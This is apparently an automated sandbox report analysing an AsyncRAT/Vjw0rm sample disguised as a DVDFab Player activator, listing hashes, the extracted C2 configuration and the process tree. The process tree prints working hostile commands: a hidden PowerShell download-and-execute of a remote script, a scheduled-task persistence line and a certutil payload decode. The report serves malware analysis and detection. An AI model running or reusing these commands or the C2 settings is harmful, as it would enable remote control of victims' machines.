Overview

overview

10

Static

static

200CB4B34E...7A.exe

windows7_x64

10

200CB4B34E...7A.exe

windows10_x64

10

Analysis

  • max time kernel
    143s
  • max time network
    147s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    18-04-2021 08:01

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    200CB4B34EA0E61FE8454731BF7A107A.exe

  • Size

    1.9MB

  • MD5

    200cb4b34ea0e61fe8454731bf7a107a

  • SHA1

    a6121f8f7d8600c2278e90d5ae622c9b2d3b410b

  • SHA256

    3deec916d94fabdc65168ebd8b5f072a702781064d13b10700d9a52998a669a3

  • SHA512

    62c947626012a18c3a4644ff24909b1c2a3a427b1df4529139eb54bb74da12b5299aca0070d4b0deee168098ea7474207868644e82917bdbf130797f1676fe99

Score
10/10
asyncratvjw0rmpersistencerattrojanworm

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://www.uplooder.net/f/tl/31/ee790edf8aa2f02c1ffb71003ad4a5c8/defender.mp3

Extracted

Family

asyncrat

Version

0.5.7B

C2

46.1.54.174:87

46.1.54.174:85
Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • aes_key

    R77ian3L214LimJgd0qPoT0OH274e11M

  • anti_detection

    false

  • autorun

    false

  • bdos

    false

  • delay

    strings

  • host

    46.1.54.174

  • hwid

    3

  • install_file

  • install_folder

    %AppData%

  • mutex

    AsyncMutex_6SI8OkPnk

  • pastebin_config

    null

  • port

    87,85

  • version

    0.5.7B

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

    ratasyncrat
  • Vjw0rm

    Vjw0rm is a remote access trojan written in JavaScript.

    trojanwormvjw0rm
  • Async RAT payload 1 IoCs
    rat
  • Blocklisted process makes network request 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Drops startup file 5 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies registry class 3 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\200CB4B34EA0E61FE8454731BF7A107A.exe
    "C:\Users\Admin\AppData\Local\Temp\200CB4B34EA0E61FE8454731BF7A107A.exe"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1908
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\DVDFabPlayer5Activator.cmd" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:64
      • C:\Windows\system32\cacls.exe
        "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
        3⤵
          PID:1892
        • C:\Windows\system32\certutil.exe
          certutil -decode "C:\Users\Admin\AppData\Roaming\DVDFab Player 5\regRecord\localuse.tmp" "C:\Users\Admin\AppData\Roaming\DVDFab Player 5\regRecord\localuse.rec"
          3⤵
            PID:4264
          • C:\Windows\system32\attrib.exe
            attrib +r "C:\Users\Admin\AppData\Roaming\DVDFab Player 5\regRecord\localuse.rec"
            3⤵
            • Views/modifies file attributes
            PID:4364
        • C:\Users\Admin\AppData\Roaming\Ne - Copy.exe
          "C:\Users\Admin\AppData\Roaming\Ne - Copy.exe"
          2⤵
          • Executes dropped EXE
          • Drops startup file
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:1268
          • C:\ProgramData\conhost.exe
            C:\ProgramData/conhost.exe
            3⤵
            • Executes dropped EXE
            • Drops startup file
            • Adds Run key to start application
            • Modifies system certificate store
            • Suspicious use of WriteProcessMemory
            PID:1884
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn Skype /tr "C:\ProgramData\conhost.exe
              4⤵
              • Creates scheduled task(s)
              PID:3736
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\winlogon.vbs"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1708
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\winlogon.vbs',[System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Roaming\winlogon.vbs'))"
            3⤵
            • Drops startup file
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1120
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://www.uplooder.net/f/tl/31/ee790edf8aa2f02c1ffb71003ad4a5c8/defender.mp3');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; wasawasawasawasa
            3⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3416
      • C:\Windows\system32\OpenWith.exe
        C:\Windows\system32\OpenWith.exe -Embedding
        1⤵
        • Modifies registry class
        • Suspicious use of SetWindowsHookEx
        PID:2296
      • C:\Windows\system32\OpenWith.exe
        C:\Windows\system32\OpenWith.exe -Embedding
        1⤵
        • Modifies registry class
        • Suspicious use of SetWindowsHookEx
        PID:4180
      • C:\ProgramData\conhost.exe
        C:\ProgramData\conhost.exe
        1⤵
        • Executes dropped EXE
        • Drops startup file
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:4804
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn Skype /tr "C:\ProgramData\conhost.exe
          2⤵
          • Creates scheduled task(s)
          PID:4864

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Initial Access

      Execution

      Scheduled Task

      1
      T1053

      Persistence

      Registry Run Keys / Startup Folder

      1
      T1060

      Scheduled Task

      1
      T1053

      Hidden Files and Directories

      1
      T1158

      Privilege Escalation

      Scheduled Task

      1
      T1053

      Defense Evasion

      Modify Registry

      2
      T1112

      Install Root Certificate

      1
      T1130

      Hidden Files and Directories

      1
      T1158

      Credential Access

      Discovery

      System Information Discovery

      1
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ProgramData\conhost.exe
        MD5

        fdbd7b1910d980cf7273796a0119d252

        SHA1

        47029af064a51454662909465ce38ee5cdcc62c7

        SHA256

        3e1da2d14de49132c42e8a4ddceb5efd36e066523affcc47de6d175316ab0f4e

        SHA512

        ab43e5ba29134c62a8beb000657f83b9471a64a839d3462c9625d059b5e259a75cdd27b2536150ae40931478384f6c13ef777756391cbe4cd9d95de35b581170

        Download Submit
      • C:\ProgramData\conhost.exe
        MD5

        fdbd7b1910d980cf7273796a0119d252

        SHA1

        47029af064a51454662909465ce38ee5cdcc62c7

        SHA256

        3e1da2d14de49132c42e8a4ddceb5efd36e066523affcc47de6d175316ab0f4e

        SHA512

        ab43e5ba29134c62a8beb000657f83b9471a64a839d3462c9625d059b5e259a75cdd27b2536150ae40931478384f6c13ef777756391cbe4cd9d95de35b581170

        Download Submit
      • C:\ProgramData\conhost.exe
        MD5

        fdbd7b1910d980cf7273796a0119d252

        SHA1

        47029af064a51454662909465ce38ee5cdcc62c7

        SHA256

        3e1da2d14de49132c42e8a4ddceb5efd36e066523affcc47de6d175316ab0f4e

        SHA512

        ab43e5ba29134c62a8beb000657f83b9471a64a839d3462c9625d059b5e259a75cdd27b2536150ae40931478384f6c13ef777756391cbe4cd9d95de35b581170

        Download Submit
      • C:\ProgramData\conhost.exe.manifest
        MD5

        dea3d191f1d0f2a5ba924465a46ed502

        SHA1

        25fa8deddb7f560e849ed60e0433a638c0cca69c

        SHA256

        d628b76063bed997485067b40845ad2f24383d3f2936f94825603748543b1d5f

        SHA512

        db300c40c5891a0b4b9e8dee1abc843ac6507f9972a06505f3ed4198513dc4b06541b544312a5cb540615ac3b5db5d033709cdba962f7f28209989aa3b8bebf7

        Download Submit
      • C:\Users\Admin\AppData\Roaming\DVDFab Player 5\regRecord\localuse.rec
        MD5

        bea3f19921218df1ac5ba51ef108de85

        SHA1

        14b7dc87e78647d3e3d4ed2c6eee3011eba93a68

        SHA256

        0f8c6d5f7f0d7bf2b9807b43ab1b3e7a199bc9cb6d9e24768fbd9ffff5119c0c

        SHA512

        4b26d86da6a5f46733386d7d8ad6453cae1605d5a781c9befb26a326542d1bd6d321e05b81dcb1caa2ecd17b436c4d5e315f5d98aa69c377a10d7e72220c7c12

        Download Submit
      • C:\Users\Admin\AppData\Roaming\DVDFab Player 5\regRecord\localuse.tmp
        MD5

        bdfca84da5ba5c5cf7248cb6f57d73fc

        SHA1

        3c09e26230b406c200f18278c41afc6bde42eed5

        SHA256

        2952ff5907b110a1ee03dbdd29d50ec69425af025bc6522fedb3bd1fb19ec18a

        SHA512

        6faed5b0ce62bd307d6ee73b1e3f23c41ac49cb2428f3a114d68026baff0a77fb7d5eb7c9b9bc7e49ea9746b5cdc7987e7e18f9b1676495acdd1f32df27841ab

        Download Submit
      • C:\Users\Admin\AppData\Roaming\DVDFabPlayer5Activator.cmd
        MD5

        f4bf2bbaee1287264fd210715be2e558

        SHA1

        ea0efcb5fb67278ddc7ab162a1886bd2c88c04b9

        SHA256

        c8be0d55178972ebdcdaf5977193708a00b245c51ba866d1f8944900236862e2

        SHA512

        9b789ad964a54031e396daee9ad6325f196482d69d6f69dc8e1b8535a994118ce3d72c8eb405dc0d3442d42971882152f56ec204d1e4bc4b011d6157fd2995cc

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe
        MD5

        d41d8cd98f00b204e9800998ecf8427e

        SHA1

        da39a3ee5e6b4b0d3255bfef95601890afd80709

        SHA256

        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

        SHA512

        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Ne - Copy.exe
        MD5

        a4a1fa7769df7c47a6d69fb66aa1eb30

        SHA1

        bbcec5f1976ce639eacee23aebce966c3debe111

        SHA256

        f08aa6c8b9f5931cfff0e2ecb22c93ea177930d23ec213c1f683ce8467a49cec

        SHA512

        54e0f518c87902f3953fa00d0a4dfae655ad13bc50fb02d5777186e3ab09ba4daad67dd5fe09f6db098e1907e95156c3b27ec08f80bdb3fc2ed0cc11a9f7c84b

        Download Submit
      • C:\Users\Admin\AppData\Roaming\winlogon.vbs
        MD5

        95433f3a8de55d26ddf7864fe9cde527

        SHA1

        2f10dd935c890e89abfc16e9d959ca6163fd8bb6

        SHA256

        f63c9b2f961f0242f3d00d453a880df93c944125a57bb82942913a4527e5de49

        SHA512

        32fdd2b102f6a3dfe13a9fcb985b62b195b0eb0815959fc4d9ce3817451da2d0b03ecf4d186409694f0b49842e84207e638fc838c90009d39a1cc822451d4334

        Download Submit
      • memory/64-116-0x0000000000000000-mapping.dmp
        Download
      • memory/1120-139-0x000001AE319A0000-0x000001AE319A1000-memory.dmp
        Filesize

        4KB

        Download
      • memory/1120-187-0x000001AE319D6000-0x000001AE319D8000-memory.dmp
        Filesize

        8KB

        Download
      • memory/1120-127-0x0000000000000000-mapping.dmp
        Download
      • memory/1120-153-0x000001AE4A8E0000-0x000001AE4A8E1000-memory.dmp
        Filesize

        4KB

        Download
      • memory/1120-151-0x000001AE319D3000-0x000001AE319D5000-memory.dmp
        Filesize

        8KB

        Download
      • memory/1120-148-0x000001AE319D0000-0x000001AE319D2000-memory.dmp
        Filesize

        8KB

        Download
      • memory/1268-117-0x0000000000000000-mapping.dmp
        Download
      • memory/1708-119-0x0000000000000000-mapping.dmp
        Download
      • memory/1884-120-0x0000000000000000-mapping.dmp
        Download
      • memory/1892-132-0x0000000000000000-mapping.dmp
        Download
      • memory/1908-125-0x000000001BAA0000-0x000000001BAA2000-memory.dmp
        Filesize

        8KB

        Download
      • memory/1908-114-0x0000000000D90000-0x0000000000D91000-memory.dmp
        Filesize

        4KB

        Download
      • memory/3416-195-0x0000014162BE6000-0x0000014162BE8000-memory.dmp
        Filesize

        8KB

        Download
      • memory/3416-175-0x0000014163670000-0x0000014163671000-memory.dmp
        Filesize

        4KB

        Download
      • memory/3416-129-0x0000000000000000-mapping.dmp
        Download
      • memory/3416-194-0x0000014163630000-0x000001416363C000-memory.dmp
        Filesize

        48KB

        Download
      • memory/3416-152-0x0000014162BE3000-0x0000014162BE5000-memory.dmp
        Filesize

        8KB

        Download
      • memory/3416-150-0x0000014162BE0000-0x0000014162BE2000-memory.dmp
        Filesize

        8KB

        Download
      • memory/3736-128-0x0000000000000000-mapping.dmp
        Download
      • memory/4264-154-0x0000000000000000-mapping.dmp
        Download
      • memory/4364-163-0x0000000000000000-mapping.dmp
        Download
      • memory/4864-197-0x0000000000000000-mapping.dmp
        Download